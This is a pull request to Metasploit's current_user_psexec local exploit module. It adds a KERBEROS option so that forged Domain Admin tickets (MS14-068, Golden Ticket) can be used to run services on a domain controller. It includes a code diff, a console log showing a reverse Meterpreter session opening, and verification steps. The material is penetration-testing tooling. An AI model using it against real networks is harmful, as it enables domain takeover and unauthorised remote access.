### PR TITLE
Current User Psexec - Kerberos Support (MS14-068)

### DIFF
--- a/modules/exploits/windows/local/current_user_psexec.rb
+++ b/modules/exploits/windows/local/current_user_psexec.rb
@@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local
         ]),
       OptString.new("NAME",     [ false, "Service name on each target in RHOSTS (Default: random)" ]),
       OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
-      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'SMB', ['PSH', 'SMB'] ]),
+      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'PSH', ['PSH', 'SMB'] ]),
       OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
+      OptBool.new("KERBEROS", [ true, "Authenticate via Kerberos, dont resolve hostnames", false ])
     ])
   end
 
@@ -102,7 +103,13 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     begin
-      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
+      if datastore['KERBEROS']
+        targets = datastore['RHOSTS'].split(', ').map{ |a| a.split(' ') }.flatten
+      else
+        targets = Rex::Socket::RangeWalker.new(datastore["RHOSTS"])
+      end
+
+      targets.each do |server|
         begin
           print_status("#{server.ljust(16)} Creating service #{name}")
 


### PR DESCRIPTION
Currently after importing a Kerberos token with the kiwi extension, attempts to exploit hosts using the current_user_psexec local exploit module will fail. This is due to the Kerberos requirement to associate with the hostname.

This adds a KERBEROS datastore option which will prevent the hostnames being resolved locally, and instead send the hostnames over the remote host. TBH we probably shouldn't be resolving anything locally for 'local' exploits. This should all be done on the remote host?

```
20141210-22:17 - 192.168.153.133 exploit(current_user_psexec) > rerun
[*] Reloading module...

[*] [2014.12.10-22:17:22] Started reverse handler on 172.16.80.225:8888 
[*] [2014.12.10-22:17:22] msfdc01          Creating service kWfrGWFDDd
[*] [2014.12.10-22:17:23] msfdc01          Starting the service
[*] [2014.12.10-22:17:24] msfdc01          Deleting the service
[*] [2014.12.10-22:17:26] Sending stage (770048 bytes) to 172.16.80.10
[*] Meterpreter session 5 opened (172.16.80.225:8888 -> 172.16.80.10:63815) at 2014-12-10 22:17:43 +0000
```
## Verification
- [ ] Import a Domain Admin Kerberos Ticket (MS14-068/Golden Ticket etc)
- [ ] Run module against the Domain Controller using either DNS name or IP address in RHOSTS - will get an access denied error 5
- [ ] Apply this PR
- [ ] Set KEBEROS TRUE and set the RHOST to the DNS name of the target host.
## Fixes

https://github.com/rapid7/metasploit-framework/issues/4348
